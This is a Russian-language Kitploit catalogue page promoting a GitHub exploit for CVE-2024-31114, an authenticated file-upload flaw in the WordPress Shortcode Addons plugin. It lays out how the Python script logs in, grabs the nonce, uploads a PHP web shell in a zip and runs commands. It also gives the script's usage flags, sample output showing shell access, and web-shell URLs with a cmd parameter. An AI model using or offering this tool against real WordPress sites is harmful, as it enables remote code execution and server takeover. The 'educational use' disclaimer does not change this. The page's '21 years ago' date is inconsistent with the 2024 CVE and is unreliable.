Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-31114 — Shortcode Addons <= 3.2.5 — Произвольная загрузка файлов (требуется аутентификация: Admin+) | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2024-31114
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubnxploited/cve-2024-31114

CVE-2024-31114

Shortcode Addons <= 3.2.5 — Произвольная загрузка файлов (требуется аутентификация: Admin+)

Репозиторий
21 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-31114 - WordPress Shortcode Addons RCE Exploit

Shortcode Addons <= 3.2.5 – Аутентифицированная (Admin+) произвольная загрузка файлов
CVE ID: CVE-2024-31114
Оценка CVSS: 9.1 (Критическая)


🛠️ Описание уязвимости

Плагин Shortcode Addons – with Visual Composer, Divi, Beaver Builder, and Elementor Extension для WordPress уязвим к произвольной загрузке файлов из-за отсутствия проверки типа файлов во всех версиях до 3.2.5 включительно.

Эта ошибка позволяет аутентифицированным злоумышленникам с уровнем доступа администратора или выше загружать произвольные файлы на сервер, что может привести к удалённому выполнению кода (RCE).


🚀 Описание скрипта

Этот Python-скрипт автоматизирует эксплуатацию уязвимости. Он выполняет:

  1. Отключение проверки SSL
  2. Вход с указанными учётными данными
  3. Извлечение CSRF-токена (_wpnonce)
  4. Генерацию PHP-шелла (nxploit.php)
  5. Сжатие и загрузку его в виде .zip
  6. Подтверждение загрузки и доступ к шеллу
  7. Выполнение whoami на целевой сервере

🧪 Использование

usage: CVE-2024-31114.py [-h] -u URL -un USERNAME -p PASSWORD

Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload
By: Nxploited | Khaled Alenazi

options:
  -h, --help            Show this help message and exit
  -u, --url URL         Target URL (e.g. http://target.com)
  -un, --username USERNAME   WordPress Admin Username
  -p, --password PASSWORD    WordPress Admin Password

📤 Пример вывода

[+] Authentication successful.
[+] _wpnonce extracted: 9d8dbbc630
[+] Payload nxploit.zip created.
[+] Payload uploaded.
[+] Shell is accessible at: http://target/wp-content/uploads/shortcode-addons/nxploit.php
[+] Command output:
------------------
www-data
------------------
[+] Temporary files removed.

🐚 Использование веб-шелла

После загрузки полезной нагрузки вы можете выполнять системные команды, используя следующий формат:

http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=command

🔹 Пример:

http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=ls

Это выведет список содержимого текущего каталога на сервере.

⚠️ Отказ от ответственности

Этот инструмент предназначен только для образовательных целей и авторизованного тестирования.
Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим скриптом.

Используйте ответственно и только на тех системах, на которые у вас есть явное разрешение на тестирование.


Автор: Nxploited | Khaled Alenazi

Скачать инструмент